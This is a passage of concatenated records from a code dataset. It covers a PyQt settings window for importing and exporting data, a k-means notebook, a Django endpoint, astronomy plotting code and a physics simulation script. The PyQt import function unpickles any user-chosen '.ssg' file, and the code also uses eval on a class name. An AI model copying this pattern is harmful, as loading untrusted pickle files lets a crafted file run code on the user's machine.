self.label_2.setText(_translate(\"MainWindow\", \"Upper Control Limit Target: \"))\n self.setUclTargetButton.setText(_translate(\"MainWindow\", \"Set\"))\n self.label_3.setText(_translate(\"MainWindow\", \"Current UCL Target:\"))\n self.label_4.setText(_translate(\"MainWindow\", \"Sets the upper control limit target. Default = 100\"))\n self.uclTargetLabel.setText(_translate(\"MainWindow\", \"100\"))\n self.exportDataButton.setText(_translate(\"MainWindow\", \"Export Data\"))\n self.label_5.setText(_translate(\"MainWindow\", \"Export floating data in .SSG format so that it can be reimported to the program elsewhere \"))\n self.label_6.setText(_translate(\"MainWindow\", \"Import floating data in .SSG format so that it can be used.\"))\n self.importDataButton.setText(_translate(\"MainWindow\", \"Import Data\"))\n self.label_7.setText(_translate(\"MainWindow\", \"Resets all floating data\"))\n self.resetDataButton.setText(_translate(\"MainWindow\", \"Reset all Floating Data\"))\n self.returnToMenuButton.setText(_translate(\"MainWindow\", \"Return To Menu\"))\n self.createBackupButton.setText(_translate(\"MainWindow\", \"Create a Data Backup\"))\n self.label_8.setText(_translate(\"MainWindow\", \"Import floating data in .SSG format so that it can be used.\"))\n\n self.updateUclLabel()\n \n \n\n\n @staticmethod\n def returnToMenuPressed(self):\n runClass(\"floatMainMenu\")\n \n def settingsSetUcl(self):\n \n \n uclString = self.uclTargetInput.toPlainText()\n \n \n try:\n uclInt = round(int(uclString),0)\n except ValueError:\n self.createErrorMessage(\"Value Error\",\"Error! Value must be a whole number (ex. 
'100') not a decimal or non numeric value.)\")\n return\n\n print(\"ucl int: \",uclInt)\n\n \n \n with open(\"floatSettings.txt\",\"w\") as settingsFile:\n \n \n settingsFile.write(str(uclInt))\n settingsFile.close()\n self.updateUclLabel()\n\n def updateUclLabel(self):\n\n try:\n with open(\"floatSettings.txt\",\"r\") as settingsFile:\n \n \n lines = settingsFile.readlines()\n print(lines)\n settingsFile.close()\n except FileNotFoundError:\n with open(\"floatSettings.txt\",\"w\") as settingsFile:\n \n \n settingsFile.write(\"100\")\n settingsFile.close()\n with open(\"floatSettings.txt\",\"r\") as settingsFile:\n \n \n lines = settingsFile.readlines()\n print(lines)\n settingsFile.close()\n \n ucl = lines[0]\n self.uclTargetLabel.setText(str(ucl))\n \n\n #create error message based on input\n def createErrorMessage(self,title,message):\n errorMsg = QMessageBox()\n errorMsg.setIcon(QMessageBox.Critical)\n errorMsg.setText(title)\n errorMsg.setInformativeText(message)\n errorMsg.setWindowTitle(title)\n errorMsg.exec()\n \n def createInfoMessage(self,title,message):\n infoMsg = QMessageBox()\n infoMsg.setIcon(QMessageBox.Information)\n infoMsg.setText(title)\n infoMsg.setInformativeText(message)\n infoMsg.setWindowTitle(title)\n infoMsg.exec()\n\n def exportFloatData(self,fileExportName):\n lines =[]\n cwd = os.getcwd()\n print(\"cwd: \",cwd)\n with open(\"floatData.txt\",\"r\") as floatData:\n lines = floatData.readlines() \n floatData.close()\n\n #\"floatDataExported.ssg\"\n\n with open(fileExportName,\"wb\") as outfile:\n pickle.dump(lines,outfile)\n outfile.close()\n self.createInfoMessage(\"Data Exported Succesfully!\",\"File: '\"+ str(fileExportName) +\"' has been exported to directory: \" +str(cwd) +\"\")\n\n def importFloatData(self):\n root = Tk()\n \n root.withdraw() #don't want a full GUi keep the root window from appearing\n ftypes = [\n ('Six Sigma Grapher files', '*.ssg'), \n ('All files', '*'), \n ]\n \n filePath = askopenfilename(filetypes=ftypes) # show \"Open\" dialog box and return path\n \n if \".ssg\" in filePath:\n print(\"acceptable file\")\n\n \n \n\n confirmImportMessagebox= QMessageBox()\n confirmImportMessagebox.setIcon(QMessageBox.Warning)\n confirmImportMessagebox.setText(\"Are you sure you would like to import this data? This action cannot be undone and all current data will be overwritten.\")\n \n\n \n confirmImportMessagebox.setWindowTitle(\"Import and Overwrite?\")\n confirmImportMessagebox.addButton(QMessageBox.Yes)\n confirmImportMessagebox.addButton(QMessageBox.No)\n confirmImportMessagebox.exec()\n buttonResult = confirmImportMessagebox.clickedButton().text() #could cause probs\n buttonResult= buttonResult.replace(\"&\",\"\").lower()\n\n \n\n if buttonResult == \"yes\":#yes button is pressed\n print(\"yes\")\n importedFile = open(filePath,\"rb\")\n importedFileData = pickle.load(importedFile)\n importedFile.close()\n print(importedFileData)\n print(type(importedFileData))\n \n with open(\"floatData.txt\",\"w\") as floatData:\n for line in importedFileData:\n floatData.write(line)\n floatData.close()\n self.createInfoMessage(\"File imported succesfully!\",\"File: 'floatData.txt' has been imported succesfully!\")\n\n \n \n if buttonResult == \"no\":#no button is pressed\n print(\"nomegalul\")\n pass\n\n\n else:\n self.createErrorMessage(\"Invalid Filetype!\",\"This is an invalid filetype! 
Only '.ssg' files are accepted!\")\n            return\n\n    def clearAllData(self):\n        confirmDeleteMessagebox = QMessageBox()\n        confirmDeleteMessagebox.setIcon(QMessageBox.Warning)\n        confirmDeleteMessagebox.setText(\"Are you sure you would like to delete all data? This action is irreversible and all current data will be lost!\")\n        confirmDeleteMessagebox.setWindowTitle(\"Delete data?\")\n        confirmDeleteMessagebox.addButton(QMessageBox.Yes)\n        confirmDeleteMessagebox.addButton(QMessageBox.No)\n        confirmDeleteMessagebox.exec()\n        buttonResult = confirmDeleteMessagebox.clickedButton().text() #could cause probs\n        buttonResult = buttonResult.replace(\"&\",\"\").lower()\n\n        if buttonResult == \"yes\": #yes button is pressed\n            time.sleep(1)\n\n            proceedMessagebox = QMessageBox()\n            proceedMessagebox.setIcon(QMessageBox.Warning)\n            proceedMessagebox.setText(\"Are you sure you would like to proceed?\")\n            proceedMessagebox.setWindowTitle(\"Proceed?\")\n            proceedMessagebox.addButton(QMessageBox.Yes)\n            proceedMessagebox.addButton(QMessageBox.No)\n            proceedMessagebox.exec()\n            proceedButtonResult = proceedMessagebox.clickedButton().text() #could cause probs\n            #strip the shortcut ampersand from the proceed button's own text (not buttonResult's)\n            proceedButtonResult = proceedButtonResult.replace(\"&\",\"\").lower()\n\n            if proceedButtonResult == \"yes\": #yes button is pressed\n                print(\"proceeding to delete.\")\n                time.sleep(.3)\n                print(\"proceeding to delete..\")\n                time.sleep(.3)\n                print(\"proceeding to delete...\")\n                time.sleep(.3)\n                print(\"Deleted!\")\n\n                currentDate = datetime.date.today()\n                day = currentDate.day\n                month = currentDate.month\n                year = currentDate.year\n\n                formattedDate = \"%s-%s-%s\" % (month,day,year)\n\n                backupFileName = str(\"floatDataExported-Backup-\"+formattedDate+\".ssg\")\n\n                self.exportFloatData(str(backupFileName))\n\n                with open(\"floatData.txt\",\"w\") as floatData:\n                    floatData.write(\"\")\n\n                self.createInfoMessage(\"Data Deleted and Backup Created!\",\"All existing data has been deleted. A backup of the data was saved to file '\"+str(backupFileName)+\"' before it was deleted.\")\n\n\n#callable class called to call another class. 
how's that for alliteration?\ndef runClass(name):\n    #must call as a static method\n    MainWindow.close()\n    className = eval(name)()\n    className.setupUi(MainWindow)\n    MainWindow.show()\n\napp = QtWidgets.QApplication(sys.argv)\nMainWindow = QtWidgets.QMainWindow()\n\nRunning = True #keeps run() spinning until the app is torn down\n\ndef run():\n\n    while Running:\n        continue\n\n\n","sub_path":"sinkingFileClass.py","file_name":"sinkingFileClass.py","file_ext":"py","file_size_in_byte":43864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"411425540","text":"\n# coding: utf-8\n\n# ## Introduction to kmeans clustering\n# \n# This notebook applies the sklearn.cluster function to the synthetic data of hist2d_intro.ipynb\n\n# In[1]:\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport matplotlib\nimport os,site\nimport numpy.random as nr\nimport warnings\nfrom sklearn.cluster import KMeans\n\n\n# ### define two bullseyes using fake data from a 2-d gaussian distribution\n# \n# Use a 2-dimensional gaussian distribution to define two bullseye clusters with\n# different means and standard deviations\n\n# In[2]:\n\ndef makeRandom(meanx=None,stdx=None,meany=None,stdy=None,rho=None,\n               numpoints=100000):\n\n    \"\"\"\n    return a tuple with two vectors (xvec,yvec) giving the\n    coordinates of numpoints chosen from a two dimensional\n    Gaussian distribution\n\n    Parameters\n    ----------\n\n    meanx: float -- mean in x direction\n    stdx:  float -- standard deviation in x direction\n    meany: float -- mean in y direction\n    stdy:  float -- standard deviation in y direction\n    numpoints:  length of returned xvec and yvec\n\n\n    Returns\n    -------\n\n    (xvec, yvec): tuple of ndarray vectors of length numpoints\n\n    Example\n    -------\n\n    invalues={'meanx':450.,\n              'stdx':50,\n              'meany':-180,\n              'stdy':40,\n              'rho':0.8}\n\n    chanx,chany=makeRandom(**invalues)\n\n\n    \"\"\"\n    \n    nr.seed(50)\n    sigma=np.array([stdx**2., rho*stdx*stdy, rho*stdx*stdy, stdy**2.])\n    sigma.shape=[2,2]\n    meanvec=[meanx,meany]\n    outRandom=nr.multivariate_normal(meanvec,sigma,[numpoints,])\n    chan1=outRandom[:,0]\n    chan2=outRandom[:,1]\n    return (chan1,chan2)\n\n\n# In[3]:\n\n#\n# first bullseye centered at (x=450,y= -180)\n#\ninvalues={'meanx':450.,\n          'stdx':50,\n          'meany':-180,\n          'stdy':40,\n          'rho':0.8}\n\n\nchanx,chany=makeRandom(**invalues)\n\n#\n# second bullseye centered at (x=50,y=-80)\n#\nbullseye={'meanx':50.,\n          'stdx':14,\n          'meany':-80,\n          'stdy':14,\n          'rho':0.0}\n\nchanxB,chanyB=makeRandom(**bullseye)\nchanx=np.concatenate((chanx,chanxB))\nchany=np.concatenate((chany,chanyB))\n\n\n# ### Show the bullseyes on a scatterplot\n\n# In[4]:\n\nget_ipython().magic('matplotlib inline')\nplt.close('all')\nfig1,axis2=plt.subplots(1,1,figsize=(10,10))\nfig1.clf()\naxis2=fig1.add_subplot(111)\naxis2.plot(chanx,chany,'b.')\naxis2.set_title('scatterplot')\nfig1.savefig('scatter.png')\naxis2.set(xlabel=\"channel x\",ylabel='channel y');\n\n\n# ### reformat the data into an array of shape [samples,channels]\n\n# In[5]:\n\nX=np.vstack([chanx,chany])\nX=X.T\nX.shape\n\n\n# ### find two cluster centers\n\n# In[6]:\n\nkmeans = KMeans(n_clusters=2)\nkmeans.fit(X)\nkmeans.cluster_centers_\n\n\n# ### put the cluster centers on the scatterplot\n# \n# use the zorder keyword to get the red dots on top of the blue dots\n\n# In[7]:\n\nfig,ax=plt.subplots(1,1,figsize=(10,10))\nax.plot(chanx,chany,'b.',alpha=0.005,zorder=1)\ncenters=kmeans.cluster_centers_\nax.scatter(centers[:,0],centers[:,1],c='red',s=180,alpha=1,zorder=2);\n\n\n# ### put the cluster centers on the 2-d 
histogram\n\n# In[8]:\n\nx_num=70\ny_num=50\nx_bins=np.linspace(0,700,x_num)\ny_bins=np.linspace(-400,0,y_num)\nH,y_edges,x_edges=np.histogram2d(chany,chanx,bins=(y_bins,x_bins))\ny_centers=(y_edges[1:] + y_edges[:-1])/2.\nx_centers=(x_edges[1:] + x_edges[:-1])/2.\n\n\n# In[9]:\n\ncmap=matplotlib.cm.magma #see http://wiki.scipy.org/Cookbook/Matplotlib/Show_colormaps\ncmap.set_over('r')\ncmap.set_under('w')\ncmap.set_bad('0.75') #75% grey\nvmin= 0\nvmax= 4\nthe_norm=matplotlib.colors.Normalize(vmin=vmin,vmax=vmax,clip=False)\nfig,ax=plt.subplots(1,1,figsize=(10,10))\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n cs=ax.pcolormesh(x_centers,y_centers,np.log10(H),norm=the_norm,cmap=cmap)\n ax.scatter(centers[:,0],centers[:,1],c='red',s=180,alpha=1)\nax.set(xlabel=\"channel x\",ylabel='channel y');\ncax=fig.colorbar(cs, shrink=0.5, pad=0.05,extend='both')\nout=cax.ax.set_ylabel('log10(counts)')\nout.set_rotation(270)\nout.set_verticalalignment('bottom'); \n\n\n# In[ ]:\n\n\n\n","sub_path":"notebooks/python/cluster_intro.py","file_name":"cluster_intro.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"624921314","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\n\nfrom dongtai.endpoint import R\nfrom dongtai.utils import const\nfrom dongtai.endpoint import UserEndPoint\nfrom dongtai.models.agent import IastAgent\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass ProjectEngines(UserEndPoint):\n name = \"api-v1-project-engines\"\n description = _(\"View engine list\")\n\n def get(self, request, pid):\n auth_users = self.get_auth_users(request.user)\n queryset = IastAgent.objects.filter(user__in=auth_users, online=const.RUNNING, bind_project_id__in=[0, pid]).values(\n \"id\", \"token\")\n data = []\n if queryset:\n for item in queryset:\n data.append({\n 'id': item['id'],\n 'token': item['token'],\n 'short_name': '-'.join(item['token'].split('-')[:-1]),\n })\n return R.success(data=data)\n","sub_path":"iast/views/project_engines.py","file_name":"project_engines.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"213867680","text":"\n# coding: utf-8\n\n# # import\n\n# In[1]:\n\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\n\n\n# # Read data\n\n# In[2]:\n\nregion_name = ['ELAIS_N1','OPH','CHA_II','LUP_I','LUP_III','LUP_IV','PER','SER']\ncalg_name = ['star','gala','ysos']\nband_name = ['J', 'H', 'K', 'IRAC_1', 'IRAC_2', 'IRAC_3', 'IRAC_4', 'MIPS_1']\nqual_name = ['A', 'B', 'C', 'D', 'E', 'F', 'K', 'N', 'U']\nwavelength = [1.235, 1.662, 2.159, 3.550, 4.493, 5.731, 7.872, 23.68]\n\n\n# In[3]:\n\nwith open('../data/data_all_observation', 'rb') as data_all:\n data = pickle.load(data_all)\nwith open('../data/qual_all_observation', 'rb') as qual_all:\n qual = pickle.load(qual_all)\n\n\n# In[4]:\n\nfor region in region_name:\n for calg in calg_name:\n if region=='ELAIS_N1' and calg == 'ysos':\n continue\n else:\n############################################################\n for i in range(len(qual[region][calg])):\n for j in [0,1,2,7]:\n if qual[region][calg][i][j] == 'U':\n data[region][calg][i][j] = 0.0000001\n\n\n# In[5]:\n\ndata_number = {}\nfor region in region_name:\n data_number.setdefault(region,{})\n for calg in calg_name:\n if region=='ELAIS_N1' and calg == 'ysos':\n 
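# ELAIS_N1 has no YSO sample in this dataset, so skip that (region, class) pair\n            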
continue\n else: \n data_number[region].setdefault(calg,[])\n data_number[region][calg] = len(data[region][calg])\ndata_number\n\n\n# In[6]:\n\nstar = np.vstack(data[region]['star'] for region in region_name)\ngala = np.vstack(data[region]['gala'] for region in region_name)\nysos = np.vstack(data[region]['ysos'] for region in region_name[1:])\nprint(len(star), len(gala), len(ysos))\n\n\n# # 1. Typical SED\n\n# In[7]:\n\nfrom matplotlib import rc\nrc('text', usetex=True)\nrc('font', family='serif')\nimport matplotlib.ticker as ticker\n\n\n# In[8]:\n\n\"\"\"\nsample = {}\nsample['star'] = np.random.choice(len(star),15,replace = False)\nsample['gala'] = np.random.choice(len(gala),15,replace = False)\nsample['ysos'] = np.random.choice(len(ysos),15,replace = False)\nwith open('sample', 'wb') as f:\n pickle.dump(sample,f)\n\"\"\"\n\n\n# In[9]:\n\nplt.figure(figsize=(16,8))\n\nwith open('sample', 'rb') as f:\n sample = pickle.load(f)\n#=======star===========\nplt.subplot(2,3,1)\nfor i in sample['star']:\n star_sed = star[i]/np.max(star[i][:8])\n plt.plot(wavelength, star_sed[:8])\nplt.subplot(2,3,4)\nfor i in sample['star']:\n star_sed = star[i]/np.max(star[i][:8])\n plt.plot(wavelength, star_sed[8:])\n#=======gala===========\nplt.subplot(2,3,2)\nfor i in sample['gala']:\n gala_sed = gala[i]/np.max(gala[i][:8])\n plt.plot(wavelength, gala_sed[:8])\nplt.subplot(2,3,5)\nfor i in sample['gala']:\n gala_sed = gala[i]/np.max(gala[i][:8])\n plt.plot(wavelength, gala_sed[8:])\n#=======ysos===========\nplt.subplot(2,3,3)\nfor i in sample['ysos']:\n ysos_sed = ysos[i]/np.max(ysos[i][:8])\n plt.plot(wavelength, ysos_sed[:8])\nplt.subplot(2,3,6)\nfor i in sample['ysos']:\n ysos_sed = ysos[i]/np.max(ysos[i][:8])\n plt.plot(wavelength, ysos_sed[8:])\n\n################################################################ \n \ntitle = ['(a) SED of stars', '(b) SED of galaxies','(c) SED of YSOs',\n '(d) Error of stars', '(e) Error of galaxies', '(f) Error of YSOs']\n\nfor i in range(6):\n\n# set ticks\n plt.subplot(2,3,i+1)\n plt.tick_params(labelsize=20)\n plt.xscale('log', basex = 2)\n plt.xlim(1.15,25)\n if i in [0,1,2]:\n plt.xticks(np.array([]))\n plt.ylim(0,1.2)\n else:\n plt.xticks(np.array([2,5,10,20]))\n plt.ylim(0,0.6)\n \n if i == 0:\n plt.yticks([0.0,0.2,0.4,0.6,0.8,1.0,1.2])\n elif i in [1,2]:\n plt.yticks([0.0,0.2,0.4,0.6,0.8,1.0,1.2])\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n elif i ==3:\n plt.yticks([0.0,0.1,0.2,0.3,0.4,0.5])\n else:\n plt.yticks([0.0,0.1,0.2,0.3,0.4,0.5])\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n \n plt.gca().xaxis.set_major_formatter(ticker.ScalarFormatter())\n plt.gca().xaxis.set_ticks_position('both')\n plt.gca().xaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().yaxis.set_ticks_position('both')\n plt.gca().yaxis.set_tick_params(direction='inout', length = 6)\n\n# set axis label\n if i in [3,4,5]:\n plt.xlabel(r'\\textup{Wavelength ($\\mu$m)}', fontsize = 22)\n if i == 0: \n plt.ylabel(r'\\textup{Normalized Flux}', fontsize = 22)\n if i == 3: \n plt.ylabel(r'\\textup{Normalized Error}', fontsize = 22)\n\n# set linewidth\n plt.subplot(2,3,i+1).spines['left'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['right'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['top'].set_linewidth(1.3)\n plt.subplot(2,3,i+1).spines['bottom'].set_linewidth(1.3)\n\n# set title\n if i in [0,1,2]:\n plt.text(1.2, 1.1, title[i],fontsize=18, ha = 'left', va = 'center')\n else:\n plt.text(1.2, 0.55, title[i],fontsize=18, ha = 'left', va = 
'center')\n\n\nplt.subplots_adjust(wspace = 0, hspace = 0)\n#plt.savefig('../figure/SED_error.png', dpi = 600)\n\n\n# # 2 Flux-Error\n\n# In[10]:\n\nplt.figure(figsize=(16,8))\n\nfor i in range(8):\n# plot flux - error\n plt.subplot(2,4,i+1)\n plt.scatter(np.transpose(star)[i], np.transpose(star)[i+8], color = [0,0,1], label ='Star', s= 1)\n plt.scatter(np.transpose(gala)[i], np.transpose(gala)[i+8], color = [0,1,0], label ='Galaxy', s= 1)\n plt.scatter(np.transpose(ysos)[i], np.transpose(ysos)[i+8], color = [1,0,0], label ='YSO', s= 1)\n\n# set ticks\n plt.xscale('log')\n plt.yscale('log')\n plt.xlim(1e-3, 100000)\n plt.ylim(1e-3, 100000)\n plt.xticks(np.array([1e-1,1e1,1e3,1e5]),fontsize = 15)\n plt.yticks(np.array([1e-1,1e1,1e3,1e5]),fontsize = 15)\n plt.tick_params(labelsize=18)\n\n# set linewidth\n plt.subplot(2,4,i+1).spines['left'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['right'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['top'].set_linewidth(1.2)\n plt.subplot(2,4,i+1).spines['bottom'].set_linewidth(1.2)\n\n# set axis label\n plt.gca().xaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().xaxis.set_ticks_position('both')\n plt.gca().yaxis.set_tick_params(direction='inout', length = 6)\n plt.gca().yaxis.set_ticks_position('both')\n # x-axis \n if i in [0,1,2,3]:\n plt.gca().xaxis.set_major_formatter(plt.NullFormatter()) \n else:\n plt.xlabel(r'\\textup{Flux (mJy)}', fontsize = 22)\n # y-axis \n if i in [1,2,3,5,6,7]:\n plt.gca().yaxis.set_major_formatter(plt.NullFormatter())\n else:\n plt.ylabel(r'\\textup{Error (mJy)}', fontsize = 22)\n # legend and grid\n if i ==0: \n plt.legend(loc = 'upper right',prop={'size': 15}) \n plt.grid()\n\n# set title\n band = ['(a) UKIRT J', '(b) UKIRT H', '(c) UKIRT K','(d) IRAC 1', '(e) IRAC 2', '(f) IRAC 3', '(g) IRAC 4', '(h) MIPS 1']\n plt.text(0.002, 25000, band[i],fontsize=18, ha = 'left', va = 'center')\n\nplt.subplots_adjust(wspace = 0, hspace = 0)\n#plt.savefig('../figure/error-flux.png', dpi = 600)\n\n\n# # 3. 
3D plot\n\n# In[ ]:\n\nfrom mpl_toolkits.mplot3d import Axes3D \n\n\n# In[ ]:\n\nplt.figure(figsize = (8,8))\nax = plt.subplot(111, projection='3d') \n\n#plot\nax.scatter(np.log10(np.transpose(star)[5]), np.log10(np.transpose(star)[6]), np.log10(np.transpose(star)[7]), c=[0,0,1], label = 'star', s= 3)\nax.scatter(np.log10(np.transpose(gala)[5]), np.log10(np.transpose(gala)[6]), np.log10(np.transpose(gala)[7]), c=[0,1,0], label = 'galaxy', s= 3)\nax.scatter(np.log10(np.transpose(ysos)[5]), np.log10(np.transpose(ysos)[6]), np.log10(np.transpose(ysos)[7]), c=[1,0,0], label = 'yso', s= 3)\n\n#set axis\nax.set_zlabel(r'\\bf{MIPS 1 (mJy)}', fontsize = 13) # axis label\nax.set_ylabel(r'\\bf{IRAC 4 (mJy)}', fontsize = 13)\nax.set_xlabel(r'\\bf{IRAC 3 (mJy)}', fontsize = 13)\n\nax.set_xlim(-2,4)\nax.set_ylim(-2,4)\nax.set_zlim(-2,4)\n\n#set log scale\n#ticks = [1e-2, 1e-1, 1e0,1e1, 1e2, 1e3]\nticks = [0.01,0.1,1, 10,100,1000]\nax.set_xticks(np.log10(ticks))\nax.set_xticklabels(ticks, fontsize = 13)\n\nax.set_yticks(np.log10(ticks))\nax.set_yticklabels(ticks, fontsize = 13)\n\nax.set_zticks(np.log10(ticks))\nax.set_zticklabels(ticks, fontsize = 13)\n\nax.legend(prop={'size': 15})\nplt.savefig('../figure/3D_plot.png', dpi = 600)\n\n\n# In[ ]:\n\ns = wavelength[:8]\nplt.figure(figsize=(12,8))\nplt.subplot(2,2,1)\nplt.errorbar(s, np.mean((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],\n             np.std((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],label = 'star', capsize = 5)\nplt.errorbar(s, np.mean((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8], \n             np.std((gala.T/np.max(gala, axis = 1)).T,axis = 0)[:8],label = 'gala', capsize = 5)\nplt.errorbar(s, np.mean((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],\n             np.std((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],label = 'ysos', capsize = 5)\nplt.xscale('log')\n#plt.yscale('log')\n#plt.ylim(-200,500)\nplt.xlabel('wavelength')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,2)\nplt.errorbar(s, np.mean((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],\n             np.std((star.T/np.max(star, axis = 1)).T, axis = 0)[:8],label = 'star', capsize = 5)\nplt.xscale('log')\n#plt.ylim(-5,20)\nplt.xlabel('wavelength')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,3)\nplt.errorbar(s, np.mean((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8],\n             np.std((gala.T/np.max(gala, axis = 1)).T, axis = 0)[:8],label = 'gala', capsize = 5, c = 'orange')\nplt.xscale('log')\n#plt.ylim(-3,5)\nplt.xlabel('wavelength')\nplt.ylabel('SED')\nplt.legend()\n\nplt.subplot(2,2,4)\nplt.errorbar(s, np.mean((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],\n             np.std((ysos.T/np.max(ysos, axis = 1)).T, axis = 0)[:8],label = 'ysos', capsize = 5, c = 'g')\nplt.xscale('log')\n#plt.ylim(100,300)\nplt.xlabel('wavelength')\nplt.ylabel('SED')\nplt.legend()\n\n\n# ## color-color diagrams\n\n# In[ ]:\n\ndef abs_mag(SED):\n    return -2.5*np.log(SED)/np.log(10)\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[6])-abs_mag(star.T[7]), label = 'star', s = 1)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[6])-abs_mag(gala.T[7]), label = 'gala', s = 1)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[6])-abs_mag(ysos.T[7]), label = 'ysos', s = 1)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('IR4 - MP1')\nplt.legend()\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[5])-abs_mag(star.T[7]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[5])-abs_mag(gala.T[7]), 
label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[5])-abs_mag(ysos.T[7]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('IR3 - MP1')\nplt.legend()\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[6]), abs_mag(star.T[7]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[6]), abs_mag(gala.T[7]), label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[6]), abs_mag(ysos.T[7]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - IR4')\nplt.ylabel('MP1')\nplt.legend()\n\n\n# In[ ]:\n\nplt.scatter(abs_mag(star.T[5])-abs_mag(star.T[7]), abs_mag(star.T[5]), label = 'star', s = 3)\nplt.scatter(abs_mag(gala.T[5])-abs_mag(gala.T[7]), abs_mag(gala.T[5]), label = 'gala', s = 3)\nplt.scatter(abs_mag(ysos.T[5])-abs_mag(ysos.T[7]), abs_mag(ysos.T[5]), label = 'ysos', s = 3)\nplt.xlabel('IR3 - MP1')\nplt.ylabel('IR4')\nplt.legend()\n\n\n# In[ ]:\n\n\n\n","sub_path":"plot_pictures/plot_figure.py","file_name":"plot_figure.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"422452332","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom simulation import *\n\nstart = time.time()\n\n# simulation parameters\nN = 100\nL = 1.0\nalpha = 0.5\ndt = 0.05\ngamma = 0.05\nn = 100000\n\n# thermal expansion coefficient simulation parameters\naverage_start = int(0.5*n)\nT_min = 0.005\nT_max = 0.05\npoints = 10\nrepeats = 10\n\nTs = np.linspace(T_min, T_max, points)\n\n# run simulations\nl_aves = np.zeros(points)\nfor i,T in enumerate(Ts):\n l_ave = 0.0\n print('Temperature {}: {:.3f}'.format(i+1,T))\n for j in range(repeats):\n sim = Simulation()\n sim.init_integrator('baoab', dt)\n sim.init_thermostat(gamma, T)\n sim.init_chain(N, L, alpha, 'gaussian', 0.1)\n sim.init_output(l=True)\n sim.run(n)\n\n # compute average length\n l = sim.l_hist[average_start:]\n l_ave += np.mean(l)\n\n l_aves[i] = l_ave / repeats\n\n# compute gradient\n\n# normalise with respect to chain length\nspacing_aves = l_aves / (L*(N-1))\nfit = np.polyfit(Ts, spacing_aves, 1)\ngradient = fit[0]\noffset = fit[1]\n\n# compute fit for plot\nfit_data = offset + gradient*Ts\n\nprint('Alpha:', alpha)\nprint('Thermal expansion coefficient:', gradient)\n\nend = time.time()\nprint(\"Elapsed Time:\", end-start)\n\n# plot results\nplt.xlabel('Temperature')\nplt.ylabel('Average Spacings')\nplt.scatter(Ts, spacing_aves, label='Data')\nplt.plot(Ts, fit_data, label='Fit')\nplt.legend()\nplt.show()\n","sub_path":"question_4.py","file_name":"question_4.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"369783473","text":"\n\nfrom xai.brain.wordbase.adjectives._bleak import _BLEAK\n\n#calss header\nclass _BLEAKER(_BLEAK, ):\n\tdef __init__(self,): \n\t\t_BLEAK.__init__(self)\n\t\tself.name = \"BLEAKER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"bleak\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_bleaker.py","file_name":"_bleaker.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"602434072","text":"__author__ = 'Harry'\n\nimport MyUtil, pandas\n\ndef getSecdbUrlByAccessNum(accession_num):\n acc_num_int = int(accession_num.replace('-',''))\n prefix= acc_num_int % 2999\n url = 
